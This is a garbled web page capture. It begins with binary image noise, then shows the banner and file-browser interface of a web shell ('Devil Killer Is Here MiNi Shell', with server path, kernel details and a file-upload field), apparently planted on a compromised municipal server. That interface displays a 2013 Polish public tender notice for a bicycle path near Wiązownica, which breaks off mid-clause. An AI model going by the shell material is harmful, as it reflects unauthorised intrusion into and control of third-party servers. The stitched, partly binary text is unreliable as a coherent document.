JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130213/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130213/59224-N-2013.html

<p class="kh_header"><b>Wiązownica: Budowa  ścieżki rowerowej na trasie Szówsko- Wiązownica - Radawa 
w ramach przebudowy pasa drogowego drogi wojewódzkiej nr  870 i drogi 
powiatowej nr 1704R wraz z  remontem ścieżki dydaktyczno -
przyrodniczej w m. Radawa.</b><br>
<b>Numer ogłoszenia: 59224 - 2013; data zamieszczenia: 13.02.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wójt Gminy Wiązownica , Wiązownica 208, 37-522 Wiązownica, woj. podkarpackie, tel. 016 622-36-31.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wiazownica.regiony.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa  ścieżki rowerowej na trasie Szówsko- Wiązownica - Radawa 
w ramach przebudowy pasa drogowego drogi wojewódzkiej nr  870 i drogi 
powiatowej nr 1704R wraz z  remontem ścieżki dydaktyczno -
przyrodniczej w m. Radawa..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest wykonanie robót budowlanych na zadaniu inwestycyjnym  o nazwie:   Budowa  ścieżki rowerowej na trasie Szówsko- Wiązownica - Radawa w ramach przebudowy pasa drogowego drogi wojewódzkiej i powiatowej. 
Inwestycja będzie  obejmować budowę ścieżki rowerowej wzdłuż drogi wojewódzkiej nr 870 relacji Sieniawa - Jarosław na odcinku 3 829 m. w km: od 15+041,75 do 16+585,00 oraz 17+420 ,00 do 19+705,50, drogi powiatowej nr 1704R relacji Wiązownica Radawa - Wola Mołodycka w km: od 0+000,00  do 3+834,80 wraz z remontem nawierzchni ścieżki dydaktycznej wraz ze zjazdami  w miejscowości Radawa w km 3+834,80 do 8+106,68.
Roboty będą prowadzone w pasie drogowym drogi wojewódzkiej oraz pasie drogowym drogi powiatowej - pod ruchem.   W związku z powyższym Wykonawca będzie zobowiązany uzgodnić projekt  organizacji ruchu  oraz bezpieczeństwo  oraz  zapewnić  organizację ruchu i bezpieczeństwo robót na czas realizacji zamówienia  na własny koszt.
Ponadto w ramach przedmiotowego zadania  przeprowadzona zostanie renowacja 2 cmentarzy wpisanych do rejestru zabytków, zlokalizowanych w miejscowości Radawa. W ramach renowacji  wykonane zostaną roboty remontowe  elementów metalowych ogrodzenia cmentarza rzymsko - katolickiego na działce nr ewid. 570  oraz remont ( wymianę)  elementów ogrodzenia   drewnianego cmentarza wojennego na działce nr ewid. 631/5 i 631/8.
Ponadto ustawionych zostanie 30 tablic informacyjnych.
Parametry techniczne ścieżki: 
-	ścieżka rowerowa jednokierunkowa szer. 1,5 m.
-	warstwa ścieralna z  betonu asfaltowego średnioziarnistego gr. 4 cm.
-	podbudowa z kruszywa łamanego 4-63 stabilizowane mechanicznie gr. 15 cm.
-	podbudowa  ze żwiru (miał kamienny) gr. 15 cm.  
-	spadek poprzeczny ścieżki jednostronny 2%.
-	oznakowanie pionowe i poziome,

W ramach przedmiotowego zamówienia planuje się wykonać następujące elementy :   
Na odcinku drogi wojewódzkiej w km: od 15+041,75 do 16+585,00 oraz 17+420 ,00 do 19+705,50:
              Roboty przygotowawcze i rozbiórkowe:
-       demontaż  starych zjazdów i przepustów,
-       demontaż  schodów i elementów kolidujących z rowami odwadniającymi,
-       roboty ziemne,
-       karczowanie  drzew i krzewów,
-       pomiary geodezyjne,
Roboty budowlane:
-       wykonanie koryta gł. 34 cm.
-       wykonanie podbudowy z miału kamiennego  warstwa gr. 15 cm. 
-       wykonanie podbudowy z  kruszywa łamanego 4/63 warstwa gr. 15 cm.
-       wykonanie nawierzchni  ścieralnej ścieżki  z betonu asfaltowego gr. 4 cm. 
Roboty montażowe odwodnienia:.
-       wykonanie rowów krytych, kanały z rur  PVC fi 315 i 400 mm.
-       wykonanie studni rewizyjnych fi 100 cm.
-       wykonanie studzienek ściekowych z rur fi 60 cm.
-       wykonanie przyłączy kanalizacyjnych fi 20 cm.
-       wykonanie rowów otwartych przez ułożenie betonowych koryt ściekowych na 
         ławie betonowej gr. 20 cm.
-       wykonanie ułożenia ścieków (na zjazdach) na ławach z betonu B-25,

Na odcinku drogi powiatowej w km:  od 0+000 do 0+160  przewiduje się wykonanie: 
Roboty przygotowawcze i rozbiórkowe:
-	demontaż  starych zjazdów i przepustów,
-	roboty ziemne,
-	karczowanie  drzew i krzewów,
Roboty budowlane
-	wykonanie koryta gł. 34 cm,
-	wykonanie podbudowy z miału kamiennego warstwa gr. 15 cm. 
-	wykonanie podbudowy z  kruszywa łamanego 4/63 warstwa gr. 15 cm.
-	wykonanie nawierzchni  ścieralnej ścieżki  z betonu asfaltowego gr. 4 cm. 
Roboty montażowe odwodnienia:  
-	wykonanie rowów krytych, kanały z rur  PVC fi 315 i 400 mm.
-	wykonanie studni rewizyjnych fi 100 cm.
-	wykonanie studzienek ściekowych z rur fi 60 cm.
-	wykonanie przyłączy kanalizacyjnych fi 20 cm.
-	wykonanie rowów otwartych przez ułożenie betonowych koryt ściekowych na 
        ławie betonowej gr. 20 cm.
-	wykonanie ułożenia ścieków (na zjazdach) na ławach z betonu B-25,
UWAGA: Na pozostałym odcinku drogi powiatowej w km:  od 0+160 do 3+800   zrezygnowano z projektowanego  rowu krytego, ścieków korytkowych oraz przebudowy przepustów na zjazdach.  Na tym odcinku ścieżka rowerowa projektowana jest poza istniejącym rowem otwartym i obejmuje wykonanie  zakresu  robót dotyczących wyłącznie  robót  przygotowawczo - rozbiórkowych i robót budowlanych: 
-	demontaż  starych zjazdów i przepustów,
-	roboty ziemne,
-	wykonanie koryta gł. 34 cm,
-	wykonanie podbudowy z miału kamiennego  warstwa gr. 15 cm. 
-	wykonanie podbudowy z  kruszywa łamanego 4/63 warstwa gr. 15 cm.
-	wykonanie nawierzchni  ścieralnej ścieżki  z betonu asfaltowego gr. 4 cm. 

Na pozostałym odcinku drogi powiatowej i gminnej  w km. 3+775,00 do  8+106,68 (tereny leśne)  przewiduje się  wykonanie remontu nawierzchni  ścieżki dydaktyczno - przyrodniczej, parkingów leśnych wraz ze zjazdami, w  szczególności:
-	roboty ziemne,
-	karczowanie  drzew i krzewów
-	wykonanie przepustów  kanalizacyjnych fi 40 cm. i 60 cm.  
-	wykonanie koryta (zdjęcie humusu),
-	wykonanie podbudowy z miału kamiennego  warstwa gr. 15 cm. 
-	wykonanie podbudowy z  kruszywa łamanego 4/63 warstwa gr. 15 cm.
-	wykonanie nawierzchni  ścieralnej ścieżki  z betonu asfaltowego gr. 4 cm. 
-	wykonanie remontu mostków metalowych..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.62-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.07.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.  Przystępując do niniejszego postępowania każdy Wykonawca zobowiązany jest  wnieść wadium   w wysokości  35 000 zł.   (słownie: trzydzieści pięć tysięcy złotych).
 2. Wykonawca może wnieść wadium  w jednej lub kilku  formach w art. 45 ust. 2 ustawy Pzp, tj.:     
1) w pieniądzu;      
2) w poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;       
3) w gwarancjach bankowych;
4) gwarancjach ubezpieczeniowych;
5) w poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust.5 pkt. 2 ustawy   z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 42, poz. 275 oraz z 2007 r. z e zmianami).
3. Wykonawca zobowiązany jest wnieść wadium przed upływem terminu składania ofert.
4. Wadium w pieniądzu należy wnieść  przelewem na konto Zamawiającego w BS Jarosław o/Wiązownica, numer konta 56 9096 1014 2002 1400 0202 0001    
5. W przypadku wadium wnoszonego w pieniądzu, jako termin wniesienia wadium przyjęty zostaje termin uznania kwoty na rachunku zamawiającego. 
6. W przypadku wniesienia wadium  formie innej niż w pieniądzu - oryginał dokumentu   potwierdzającego wniesienie wadium należy złożyć przed upływem terminu składania ofert w  siedzibie Zamawiającego - Urząd Gminy Wiązownica, w kasie Urzędu pok. nr 44 II p. a  kserokopię dokumentu poświadczoną za zgodność z oryginałem należy dołączyć do oferty.
7. W przypadku składania oferty wspólnej, wadium wniesione przez jednego ze wspólników uważa się za wniesione prawidłowo.
8. Brak wniesienie wadium w terminie lub w sposób określony w SIWZ spowoduje wykluczenie  Wykonawcy na podstawie art. 24 ust. 2 pkt. 2
9. Zwrotu  i zatrzymania złożonego wadium przetargowego  zamawiający dokona zgodnie z przepisami art. 46 ust. 1-5  ustawy Prawo zamówień publicznych.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku w tym zakresie. 
Ocena spełniania warunku zostanie dokonana na podstawie załączonego do oferty 
oświadczenia wykonawcy.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony jeżeli w okresie ostatnich 5 lat przed upływem  terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, zgodnie z zasadami sztuki budowlanej wykonali i prawidłowo ukończyli co najmniej 1 robotę budowlaną odpowiadającą  swoim rodzajem i zakresem  przedmiotowi zamówienia, tzn. polegającą na  budowie, przebudowie lub remoncie  dróg, ulic,  ścieżek (chodników) dla pieszych, ścieżek rowerowych  wraz z rowami,  przepustami i urządzeniami odwadniającymi o  wartości co najmniej  1  000 000 zł brutto. 
       Ocena spełniania warunku zostanie dokonana na podstawie załączonego do oferty: 
       a) oświadczenia wykonawcy o spełnianiu warunków udziału w postępowaniu - art. 22 ust.1 
       b) wykazu wykonanych zamówień wg. zał. do siwz.
       c) dokumentów  potwierdzających, że wykazane roboty zostały wykonane zgodnie z zasadami 
           sztuki budowlanej i prawidłowo ukończone, np. referencje protokoły odbioru itp.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku w tym zakresie. 
Ocena spełniania warunku zostanie dokonana na podstawie załączonego do oferty 
oświadczenia wykonawcy.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za  spełniony jeżeli   dysponują  osobami zdolnymi do wykonania  zamówienia,  lub przedłożą pisemnym zobowiązaniem innych podmiotów do udostępnienia tych osób, w szczególności:
1)	dysponują co najmniej 2 osobami  (kierownik budowy i kierownik robót) posiadającymi uprawnienia do kierowania budową i robotami  budowlanymi o specjalności:
        - konstrukcyjno - budowlanej lub drogowej bez ograniczeń ;
2)	dysponują co najmniej 1 osobą ( kierownik robót) posiadającą  uprawnienia budowlane do kierowania  robotami  o specjalności: 
       - 	instalacyjnej w zakresie sieci wod. - kan. bez ograniczeń ;  
       Ocena spełniania warunku zostanie dokonana na podstawie załączonego do oferty: 
       a) oświadczenia wykonawcy o spełnianiu warunków udziału w postępowaniu - art. 22 ust.1 
       b) wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia wg. zał. do siwz
       c) oświadczenie wykonawcy, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, jeżeli wykonawcy są:
-  ubezpieczeni od odpowiedzialności cywilnej w zakresie działalności związanej z 
   przedmiotem zamówienia na kwotę co najmniej 1 500 000 złotych (słownie: jeden milion pięćset tysięcy złotych).
-  posiadają środki finansowe lub zdolność kredytową w kwocie co najmniej 1 000 000 zł.
      Ocena spełniania warunku zostanie dokonana na podstawie załączonego do oferty: 
      a) oświadczenia wykonawcy o spełnianiu warunków udziału w postępowaniu - art. 22 ust.1
      b) opłaconej polisy ubezpieczenia OC z tytułu prowadzonej działalności gospodarczej.
      c) informacji z banku lub spółdzielczej kasy oszczędnościowo - kredytowej.
Jeżeli wykonawca, wykazując spełnianie warunków, o których mowa w art. 22 ust. 1 pkt. 4 ustawy, polega na zdolnościach finansowych innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy, wymaga się przedłożenia informacji z banku lub spółdzielczej kasy oszczędnościowo - rozliczeniowej potwierdzającej wysokość posiadanych środków finansowych lub zdolności kredytowej dot. tego podmiotu.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>- formularz oferty;
   - kosztorys ofertowy skrócony;
   - parafowany projekt umowy;
   - harmonogram rzeczowo - finansowy;
   - pełnomocnictwo w przypadku wspólnego ubiegania się o udzielenie zamówienia;
   - pisemne zobowiązanie podmiotów oddających do  dyspozycji wykonawcy niezbędnych 
     zasobów na okres korzystania z nich przy wykonywaniu zamówienia (jeżeli dotyczy).</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Wszelkie zmiany w umowie pod rygorem nieważności  muszą być dokonane w formie pisemnej.
2.	Zamawiający zgodnie z art. 144 ustawy Pzp. przewiduje możliwość dokonania zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy, w przypadku wystąpienia co najmniej jednej z okoliczności:
    I. Zmiana terminu przewidzianego na rozpoczęcie lub zakończenie robót:
      1) zmiany spowodowane warunkami atmosferycznymi w szczególności:
          a) klęski żywiołowe, przez co rozumie się  zjawiska naturalne  związane z działaniem sił 
              natury, w szczególności wyładowania atmosferyczne, silne wiatry, intensywne opady 
              atmosferyczne, długotrwałe  upały,          
b)	warunki atmosferyczne odbiegające od typowych dla danego okresu,   
  uniemożliwiające prowadzenie robót budowlanych, przeprowadzenia prób i    
  sprawdzeń, dokonywania odbiorów, tj. długotrwałe  opady deszczu przez okres co   
